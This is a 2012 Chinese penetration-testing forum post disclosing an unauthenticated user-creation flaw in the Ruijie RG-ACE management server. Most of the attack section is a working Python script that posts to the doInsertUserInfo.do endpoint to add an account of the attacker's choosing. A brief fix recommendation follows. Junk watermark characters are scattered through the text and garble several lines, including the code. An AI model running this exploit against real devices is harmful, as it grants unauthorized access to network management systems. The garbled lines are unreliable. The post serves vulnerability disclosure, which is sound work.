找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 锐捷应用控制引擎管理服务器可以增加用户
返回列表 发新帖
查看: 2800|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)3 d; ?0 i& O1 b, y6 [0 Z# ^
6 t2 u3 k1 q8 J/ B( G

3 y1 [" R( _# k8 B测试的具体版本是2 u: ^- S' L6 h" T. v8 g' s: r3 |
产品名称: 锐捷应用控制引擎
" U$ A5 Y5 \0 k  m版本号: 3.1.36.001 TC
; v. `5 ^9 e/ g  R编译时间: 2011042917307 s* B7 S1 Z9 Y5 I% I

: W" E6 F4 I2 N  g; `* ^0 V3 y1 u  s9 _0 g
漏洞证明:% x, @  N5 i- K; H& M6 ?# \- a

" s; b" l7 h& n' K% @5 {1 u- g
6 M& M2 b/ H, K
4 ~8 t4 U. {8 `8 ?! c+ P
1 P- H- S0 c) Z) w2 W' s" u& O
, x  j- h2 n- h; n2 ~2 t
执行脚本
9 ~* \6 P* i2 J$ A#! /usr/bin/env python
, U+ a% ^" \, n2 q6 H3 B5 }#coding=gbk
* R6 S5 H) q+ j/ U. f$ ^$ T- e#RG-ACE管理服务器 V3.1.36.001
. a+ D+ }. U) ~- w5 `) ]import urllib2, urllib,cookielib2 m4 k* x( y, U
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP" a5 s  y; U3 s3 l
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))+ @% V+ W0 C+ r
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
/ ]& c& R- A$ H0 R) [post=(("event","userManager.doInsertUserInfo"),
: m2 m  E/ U& l# T! R" D("useractionname","addButtonValue"),0 F: y0 u) _) C. i5 C# e
("useropermanager","userManager"),4 p+ a$ p1 r' N
("userName","t"), #######账号自己加$ A8 t) ~: N: p: m, H
("pwd","aaaaaa"),######密码自己加
* P- f3 h. q2 |; x; B% n, J% v("trueName","ad"),3 @" _8 U& q- ~3 q# ]" T1 Z
("email",""),2 V/ g) B* F) n, x3 O: K+ |
("mobilePhone",""),$ P4 e3 c/ H; d0 A: U  r
("officePhone",""),+ ?7 X3 l) t# H  n0 _- [
("addr",""),, T' L" D+ h# W8 c1 Y' E4 o! v5 S; k
("submit","确定"))  h+ a3 a6 Y4 K( X! P
urllib2.install_opener(opener)8 j& }9 i0 M/ ~- q7 }
p=urllib2.urlopen(url, urllib.urlencode(post)).read(); X9 w: P+ j  ^& [: w/ X
print "Done"
+ d6 y1 o# p3 R1 H, L9 U( B/ _6 q3 n. T: D- \% {: r% _, v
登录,连接设备3 J* r  ~! |# v/ o2 q
- l( Q$ s# W5 m% \
0 p5 j" e! D- Y% ~9 j3 {/ {
; Q, c/ \$ o  w. r& [
! p4 ~" c( n. R, I% f
3 `( s* E% x2 V3 D: O9 x) A
默认的管理员admin权限更大点
$ v; p* ~5 U+ U6 i3 m1 a
9 E: C! }7 u$ W% C3 L) V# _1 I2 G/ D, |
0 ^' _# Y" M! c' H

2 @2 N6 }* C8 l* U# |) H# E& U, v" L+ p
修复方案:3 t: Q& r# z, s7 |
加强对接口的权限验证
2 \# G6 n# }; _; A+ A: z
! y6 {8 @( @4 N1 M! s& K; ~0 n) ]. n
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表